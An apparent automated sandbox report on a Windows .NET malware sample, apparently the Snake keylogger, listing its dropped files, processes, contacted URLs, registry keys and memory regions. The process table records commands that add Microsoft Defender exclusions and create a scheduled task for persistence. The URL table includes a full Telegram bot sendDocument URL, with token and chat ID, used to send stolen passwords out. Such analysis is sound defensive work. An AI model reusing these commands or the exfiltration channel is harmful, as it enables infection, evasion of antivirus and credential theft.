Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
rPO0977-6745.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPO0977-6745.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\tmp44AD.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EDyxAgkldisLe.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ley3isf.vh3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jiszu5j.bcl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5c0grjqc.amp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddap2fxj.pnj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrnefvhn.udn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4zpmwxp.xmh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_um2plh5i.fqs.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w20wx3ac.dgs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp547C.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\rPO0977-6745.exe
|
"C:\Users\user\Desktop\rPO0977-6745.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"
|
|
|
|
C:\Users\user\Desktop\rPO0977-6745.exe
|
"C:\Users\user\Desktop\rPO0977-6745.exe"
|
|
|
|
C:\Users\user\Desktop\rPO0977-6745.exe
|
"C:\Users\user\Desktop\rPO0977-6745.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
|
C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp"
|
|
|
|
C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
|
"C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://api.telegram.org
|
unknown
|
|
|
|
https://api.telegram.org/bot
|
unknown
|
|
|
|
https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535
|
unknown
|
||
|
https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake
|
149.154.167.220
|
||
|
http://checkip.dyndns.org/
|
158.101.44.242
|
||
|
https://reallyfreegeoip.org/xml/8.46.123.33$
|
unknown
|
||
|
http://microsoft.co
|
unknown
|
||
|
http://checkip.dyndns.orgh
|
unknown
|
||
|
http://checkip.dyndns.org/q
|
unknown
|
||
|
http://tempuri.org/DataSet1.xsd
|
unknown
|
||
|
http://reallyfreegeoip.org
|
unknown
|
||
|
https://reallyfreegeoip.org
|
unknown
|
||
|
http://checkip.dyndns.org
|
unknown
|
||
|
http://checkip.dyndns.com
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/8.46.123.33
|
188.114.97.3
|
||
|
http://api.telegram.org
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
reallyfreegeoip.org
|
188.114.97.3
|
|
|
|
api.telegram.org
|
149.154.167.220
|
|
|
|
15.164.165.52.in-addr.arpa
|
unknown
|
|
|
|
checkip.dyndns.org
|
unknown
|
|
|
|
checkip.dyndns.com
|
158.101.44.242
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
|
|
|
188.114.97.3
|
reallyfreegeoip.org
|
European Union
|
|
|
|
158.101.44.242
|
checkip.dyndns.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\rPO0977-6745_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\EDyxAgkldisLe_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3180000
|
trusted library allocation
|
page read and write
|
|
|
|
2960000
|
trusted library allocation
|
page read and write
|
|
|
|
2791000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
29EE000
|
trusted library allocation
|
page read and write
|
|
|
|
41F9000
|
trusted library allocation
|
page read and write
|
|
|
|
2F21000
|
trusted library allocation
|
page read and write
|
|
|
|
2A55000
|
trusted library allocation
|
page read and write
|
|
|
|
30ED000
|
trusted library allocation
|
page read and write
|
|
|
|
3A5D000
|
trusted library allocation
|
page read and write
|
|
|
|
31E6000
|
trusted library allocation
|
page read and write
|
|
|
|
4E23000
|
heap
|
page read and write
|
||
|
3FBB000
|
trusted library allocation
|
page read and write
|
||
|
4191000
|
trusted library allocation
|
page read and write
|
||
|
1610000
|
trusted library allocation
|
page read and write
|
||
|
4DD1000
|
trusted library allocation
|
page read and write
|
||
|
54F1000
|
trusted library allocation
|
page read and write
|
||
|
3F8A000
|
trusted library allocation
|
page read and write
|
||
|
53AE000
|
trusted library allocation
|
page read and write
|
||
|
7860000
|
trusted library section
|
page read and write
|
||
|
D1B000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C90000
|
heap
|
page read and write
|
||
|
53DA000
|
trusted library allocation
|
page read and write
|
||
|
E79000
|
stack
|
page read and write
|
||
|
5130000
|
trusted library allocation
|
page execute and read and write
|
||
|
E38000
|
heap
|
page read and write
|
||
|
6BCB000
|
trusted library allocation
|
page read and write
|
||
|
CED000
|
trusted library allocation
|
page execute and read and write
|
||
|
52B0000
|
heap
|
page read and write
|
||
|
5490000
|
trusted library allocation
|
page read and write
|
||
|
53D4000
|
trusted library allocation
|
page read and write
|
||
|
B9D000
|
stack
|
page read and write
|
||
|
13CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
546E000
|
stack
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
57C0000
|
heap
|
page execute and read and write
|
||
|
5140000
|
heap
|
page execute and read and write
|
||
|
D58000
|
heap
|
page read and write
|
||
|
53CD000
|
trusted library allocation
|
page read and write
|
||
|
7870000
|
trusted library section
|
page read and write
|
||
|
145A000
|
heap
|
page read and write
|
||
|
5590000
|
trusted library allocation
|
page read and write
|
||
|
5540000
|
heap
|
page read and write
|
||
|
E2E000
|
heap
|
page read and write
|
||
|
95E000
|
stack
|
page read and write
|
||
|
A8AE000
|
stack
|
page read and write
|
||
|
2DFF000
|
unkown
|
page read and write
|
||
|
64E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FDC000
|
trusted library allocation
|
page read and write
|
||
|
4DB0000
|
trusted library allocation
|
page read and write
|
||
|
4A2E000
|
stack
|
page read and write
|
||
|
2F4C000
|
stack
|
page read and write
|
||
|
13D0000
|
trusted library allocation
|
page read and write
|
||
|
CC0000
|
trusted library allocation
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
8970000
|
heap
|
page read and write
|
||
|
3150000
|
trusted library allocation
|
page read and write
|
||
|
547D000
|
stack
|
page read and write
|
||
|
4DB6000
|
trusted library allocation
|
page read and write
|
||
|
3821000
|
trusted library allocation
|
page read and write
|
||
|
13E0000
|
heap
|
page read and write
|
||
|
520E000
|
stack
|
page read and write
|
||
|
7AF0000
|
trusted library section
|
page read and write
|
||
|
6EDC6000
|
unkown
|
page readonly
|
||
|
E4B000
|
heap
|
page read and write
|
||
|
3158000
|
trusted library allocation
|
page read and write
|
||
|
2AA2000
|
trusted library allocation
|
page read and write
|
||
|
79CD000
|
stack
|
page read and write
|
||
|
6EDB1000
|
unkown
|
page execute read
|
||
|
3016000
|
trusted library allocation
|
page read and write
|
||
|
496E000
|
stack
|
page read and write
|
||
|
28D2000
|
trusted library allocation
|
page read and write
|
||
|
61CE000
|
stack
|
page read and write
|
||
|
31B0000
|
trusted library allocation
|
page read and write
|
||
|
D8A000
|
stack
|
page read and write
|
||
|
5990000
|
trusted library allocation
|
page execute and read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
28DA000
|
trusted library allocation
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
4EEE000
|
trusted library allocation
|
page read and write
|
||
|
2943000
|
trusted library allocation
|
page read and write
|
||
|
4A50000
|
trusted library allocation
|
page read and write
|
||
|
37FC000
|
trusted library allocation
|
page read and write
|
||
|
2860000
|
trusted library allocation
|
page read and write
|
||
|
E50000
|
trusted library allocation
|
page read and write
|
||
|
2E00000
|
trusted library allocation
|
page read and write
|
||
|
6BA0000
|
trusted library allocation
|
page read and write
|
||
|
5DFE000
|
stack
|
page read and write
|
||
|
A68E000
|
stack
|
page read and write
|
||
|
B7E000
|
stack
|
page read and write
|
||
|
177F000
|
stack
|
page read and write
|
||
|
5020000
|
trusted library allocation
|
page execute and read and write
|
||
|
8E0D000
|
stack
|
page read and write
|
||
|
3818000
|
trusted library allocation
|
page read and write
|
||
|
31E2000
|
trusted library allocation
|
page read and write
|
||
|
328A000
|
trusted library allocation
|
page read and write
|
||
|
1294000
|
heap
|
page read and write
|
||
|
1407000
|
trusted library allocation
|
page execute and read and write
|
||
|
8E1E000
|
stack
|
page read and write
|
||
|
5210000
|
heap
|
page read and write
|
||
|
29E5000
|
trusted library allocation
|
page read and write
|
||
|
5A9000
|
stack
|
page read and write
|
||
|
1430000
|
heap
|
page execute and read and write
|
||
|
284F000
|
trusted library allocation
|
page read and write
|
||
|
638E000
|
stack
|
page read and write
|
||
|
CE4000
|
trusted library allocation
|
page read and write
|
||
|
5660000
|
trusted library allocation
|
page read and write
|
||
|
4DC2000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
13C0000
|
trusted library allocation
|
page read and write
|
||
|
6EDCF000
|
unkown
|
page readonly
|
||
|
583E000
|
stack
|
page read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
BDA000
|
stack
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
13FA000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EDB0000
|
unkown
|
page readonly
|
||
|
4283000
|
trusted library allocation
|
page read and write
|
||
|
4CB0000
|
heap
|
page read and write
|
||
|
54FD000
|
trusted library allocation
|
page read and write
|
||
|
CF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
6BB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
53D0000
|
trusted library allocation
|
page read and write
|
||
|
2887000
|
trusted library allocation
|
page read and write
|
||
|
29F1000
|
trusted library allocation
|
page read and write
|
||
|
3210000
|
trusted library allocation
|
page read and write
|
||
|
2846000
|
trusted library allocation
|
page read and write
|
||
|
3067000
|
trusted library allocation
|
page read and write
|
||
|
3063000
|
trusted library allocation
|
page read and write
|
||
|
64D6000
|
trusted library allocation
|
page read and write
|
||
|
4DF6000
|
trusted library allocation
|
page read and write
|
||
|
9C8000
|
heap
|
page read and write
|
||
|
1660000
|
heap
|
page read and write
|
||
|
165E000
|
stack
|
page read and write
|
||
|
3A19000
|
trusted library allocation
|
page read and write
|
||
|
13F2000
|
trusted library allocation
|
page read and write
|
||
|
1668000
|
heap
|
page read and write
|
||
|
2924000
|
trusted library allocation
|
page read and write
|
||
|
317B000
|
trusted library allocation
|
page read and write
|
||
|
4DF0000
|
trusted library allocation
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
4E20000
|
heap
|
page read and write
|
||
|
283E000
|
trusted library allocation
|
page read and write
|
||
|
58CE000
|
stack
|
page read and write
|
||
|
1160000
|
heap
|
page read and write
|
||
|
11E5000
|
heap
|
page read and write
|
||
|
2880000
|
heap
|
page execute and read and write
|
||
|
5E10000
|
heap
|
page read and write
|
||
|
707C000
|
heap
|
page read and write
|
||
|
1440000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D50000
|
heap
|
page read and write
|
||
|
9F6000
|
heap
|
page read and write
|
||
|
5315000
|
heap
|
page read and write
|
||
|
53C1000
|
trusted library allocation
|
page read and write
|
||
|
71C0000
|
heap
|
page read and write
|
||
|
7737000
|
heap
|
page read and write
|
||
|
4F60000
|
heap
|
page read and write
|
||
|
37B9000
|
trusted library allocation
|
page read and write
|
||
|
4E00000
|
trusted library allocation
|
page read and write
|
||
|
3088000
|
trusted library allocation
|
page read and write
|
||
|
2870000
|
trusted library allocation
|
page read and write
|
||
|
A76C000
|
stack
|
page read and write
|
||
|
4DBB000
|
trusted library allocation
|
page read and write
|
||
|
F77000
|
stack
|
page read and write
|
||
|
8B6E000
|
stack
|
page read and write
|
||
|
64DB000
|
trusted library allocation
|
page read and write
|
||
|
8D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
13DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
6050000
|
heap
|
page read and write
|
||
|
6BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9B5000
|
heap
|
page read and write
|
||
|
5990000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F90000
|
heap
|
page read and write
|
||
|
57B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4EF1000
|
trusted library allocation
|
page read and write
|
||
|
726E000
|
stack
|
page read and write
|
||
|
8596000
|
trusted library allocation
|
page read and write
|
||
|
58C7000
|
trusted library allocation
|
page read and write
|
||
|
63CE000
|
stack
|
page read and write
|
||
|
CD3000
|
trusted library allocation
|
page execute and read and write
|
||
|
5ABD000
|
stack
|
page read and write
|
||
|
4ED0000
|
trusted library allocation
|
page read and write
|
||
|
5030000
|
trusted library section
|
page readonly
|
||
|
30A3000
|
trusted library allocation
|
page read and write
|
||
|
2A7F000
|
trusted library allocation
|
page read and write
|
||
|
29CC000
|
trusted library allocation
|
page read and write
|
||
|
3180000
|
heap
|
page execute and read and write
|
||
|
4DDD000
|
trusted library allocation
|
page read and write
|
||
|
5670000
|
heap
|
page read and write
|
||
|
EE0000
|
heap
|
page read and write
|
||
|
904E000
|
stack
|
page read and write
|
||
|
31AB000
|
trusted library allocation
|
page read and write
|
||
|
30B1000
|
trusted library allocation
|
page read and write
|
||
|
D0A000
|
trusted library allocation
|
page execute and read and write
|
||
|
11D0000
|
heap
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
28FB000
|
trusted library allocation
|
page read and write
|
||
|
31B6000
|
trusted library allocation
|
page read and write
|
||
|
3027000
|
trusted library allocation
|
page read and write
|
||
|
53F3000
|
heap
|
page read and write
|
||
|
13F0000
|
trusted library allocation
|
page read and write
|
||
|
5572000
|
trusted library allocation
|
page read and write
|
||
|
305B000
|
trusted library allocation
|
page read and write
|
||
|
2875000
|
trusted library allocation
|
page read and write
|
||
|
54D0000
|
trusted library allocation
|
page read and write
|
||
|
620E000
|
stack
|
page read and write
|
||
|
CCE000
|
stack
|
page read and write
|
||
|
2FD3000
|
trusted library allocation
|
page read and write
|
||
|
661E000
|
stack
|
page read and write
|
||
|
57D0000
|
heap
|
page read and write
|
||
|
29D0000
|
trusted library allocation
|
page read and write
|
||
|
65C0000
|
heap
|
page read and write
|
||
|
5510000
|
trusted library allocation
|
page read and write
|
||
|
C72000
|
unkown
|
page readonly
|
||
|
EB0000
|
heap
|
page execute and read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
298F000
|
stack
|
page read and write
|
||
|
53BA000
|
trusted library allocation
|
page read and write
|
||
|
78CD000
|
stack
|
page read and write
|
||
|
12BA000
|
heap
|
page read and write
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
52C7000
|
trusted library allocation
|
page read and write
|
||
|
278E000
|
stack
|
page read and write
|
||
|
54F6000
|
trusted library allocation
|
page read and write
|
||
|
4FA0000
|
trusted library allocation
|
page read and write
|
||
|
4EC0000
|
trusted library allocation
|
page read and write
|
||
|
4DD6000
|
trusted library allocation
|
page read and write
|
||
|
13E0000
|
trusted library allocation
|
page read and write
|
||
|
11AE000
|
stack
|
page read and write
|
||
|
3073000
|
trusted library allocation
|
page read and write
|
||
|
C70000
|
unkown
|
page readonly
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
13D4000
|
trusted library allocation
|
page read and write
|
||
|
2940000
|
trusted library allocation
|
page read and write
|
||
|
EAE000
|
stack
|
page read and write
|
||
|
5CFE000
|
stack
|
page read and write
|
||
|
30DF000
|
trusted library allocation
|
page read and write
|
||
|
744D000
|
stack
|
page read and write
|
||
|
3191000
|
trusted library allocation
|
page read and write
|
||
|
301F000
|
trusted library allocation
|
page read and write
|
||
|
8DCC000
|
stack
|
page read and write
|
||
|
307B000
|
trusted library allocation
|
page read and write
|
||
|
4F93000
|
heap
|
page read and write
|
||
|
29DC000
|
trusted library allocation
|
page read and write
|
||
|
D30000
|
trusted library allocation
|
page read and write
|
||
|
CD0000
|
trusted library allocation
|
page read and write
|
||
|
587E000
|
stack
|
page read and write
|
||
|
15F7000
|
trusted library allocation
|
page execute and read and write
|
||
|
3077000
|
trusted library allocation
|
page read and write
|
||
|
740D000
|
stack
|
page read and write
|
||
|
1110000
|
heap
|
page read and write
|
||
|
5580000
|
trusted library allocation
|
page execute and read and write
|
||
|
5300000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
CFA000
|
trusted library allocation
|
page execute and read and write
|
||
|
63F0000
|
heap
|
page read and write
|
||
|
3791000
|
trusted library allocation
|
page read and write
|
||
|
6A50000
|
heap
|
page read and write
|
||
|
526E000
|
stack
|
page read and write
|
||
|
4EF6000
|
trusted library allocation
|
page read and write
|
||
|
69DE000
|
stack
|
page read and write
|
||
|
74EE000
|
heap
|
page read and write
|
||
|
5F4E000
|
stack
|
page read and write
|
||
|
8F0E000
|
stack
|
page read and write
|
||
|
2A12000
|
trusted library allocation
|
page read and write
|
||
|
13C4000
|
trusted library allocation
|
page read and write
|
||
|
58D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3163000
|
trusted library allocation
|
page read and write
|
||
|
7A0D000
|
stack
|
page read and write
|
||
|
CED000
|
trusted library allocation
|
page execute and read and write
|
||
|
64F0000
|
trusted library allocation
|
page read and write
|
||
|
E28000
|
heap
|
page read and write
|
||
|
15DF000
|
stack
|
page read and write
|
||
|
7820000
|
trusted library section
|
page read and write
|
||
|
7772000
|
heap
|
page read and write
|
||
|
7788000
|
heap
|
page read and write
|
||
|
7ABD000
|
stack
|
page read and write
|
||
|
7F240000
|
trusted library allocation
|
page execute and read and write
|
||
|
4DE2000
|
trusted library allocation
|
page read and write
|
||
|
64D8000
|
trusted library allocation
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
39F1000
|
trusted library allocation
|
page read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
10F7000
|
stack
|
page read and write
|
||
|
15E0000
|
trusted library allocation
|
page read and write
|
||
|
13CF000
|
stack
|
page read and write
|
||
|
2909000
|
trusted library allocation
|
page read and write
|
||
|
54D4000
|
trusted library allocation
|
page read and write
|
||
|
4A30000
|
trusted library allocation
|
page read and write
|
||
|
13D0000
|
trusted library allocation
|
page read and write
|
||
|
53DE000
|
trusted library allocation
|
page read and write
|
||
|
685D000
|
stack
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
6A1E000
|
stack
|
page read and write
|
||
|
58E5000
|
heap
|
page read and write
|
||
|
5010000
|
trusted library allocation
|
page read and write
|
||
|
3212000
|
trusted library allocation
|
page read and write
|
||
|
2FCB000
|
trusted library allocation
|
page read and write
|
||
|
54EE000
|
trusted library allocation
|
page read and write
|
||
|
11C0000
|
trusted library allocation
|
page read and write
|
||
|
1402000
|
trusted library allocation
|
page read and write
|
||
|
D60000
|
trusted library allocation
|
page read and write
|
||
|
52D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
64CF000
|
stack
|
page read and write
|
||
|
9E9000
|
heap
|
page read and write
|
||
|
1140000
|
heap
|
page read and write
|
||
|
D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
536E000
|
stack
|
page read and write
|
||
|
2FE6000
|
trusted library allocation
|
page read and write
|
||
|
7720000
|
heap
|
page read and write
|
||
|
E15000
|
trusted library allocation
|
page execute and read and write
|
||
|
CE0000
|
trusted library allocation
|
page read and write
|
||
|
486D000
|
stack
|
page read and write
|
||
|
30CD000
|
trusted library allocation
|
page read and write
|
||
|
D00000
|
trusted library allocation
|
page read and write
|
||
|
3F49000
|
trusted library allocation
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
29D2000
|
trusted library allocation
|
page read and write
|
||
|
30BF000
|
stack
|
page read and write
|
||
|
1400000
|
trusted library allocation
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
CD0000
|
trusted library allocation
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
2F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A1E000
|
trusted library allocation
|
page read and write
|
||
|
6BC0000
|
trusted library allocation
|
page read and write
|
||
|
29C7000
|
trusted library allocation
|
page read and write
|
||
|
1405000
|
trusted library allocation
|
page execute and read and write
|
||
|
58E0000
|
heap
|
page read and write
|
||
|
4E30000
|
trusted library allocation
|
page read and write
|
||
|
CE0000
|
trusted library allocation
|
page read and write
|
||
|
D78000
|
heap
|
page read and write
|
||
|
8C6E000
|
stack
|
page read and write
|
||
|
2896000
|
trusted library allocation
|
page read and write
|
||
|
2CAD000
|
stack
|
page read and write
|
||
|
13C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
289E000
|
trusted library allocation
|
page read and write
|
||
|
302B000
|
trusted library allocation
|
page read and write
|
||
|
E60000
|
heap
|
page read and write
|
||
|
60C9000
|
heap
|
page read and write
|
||
|
8F4E000
|
stack
|
page read and write
|
||
|
F6E000
|
stack
|
page read and write
|
||
|
630E000
|
stack
|
page read and write
|
||
|
2892000
|
trusted library allocation
|
page read and write
|
||
|
4EFD000
|
trusted library allocation
|
page read and write
|
||
|
1460000
|
trusted library allocation
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
BB5000
|
heap
|
page read and write
|
||
|
57F0000
|
heap
|
page execute and read and write
|
||
|
CDD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AF2000
|
trusted library allocation
|
page read and write
|
||
|
D02000
|
trusted library allocation
|
page read and write
|
||
|
634E000
|
stack
|
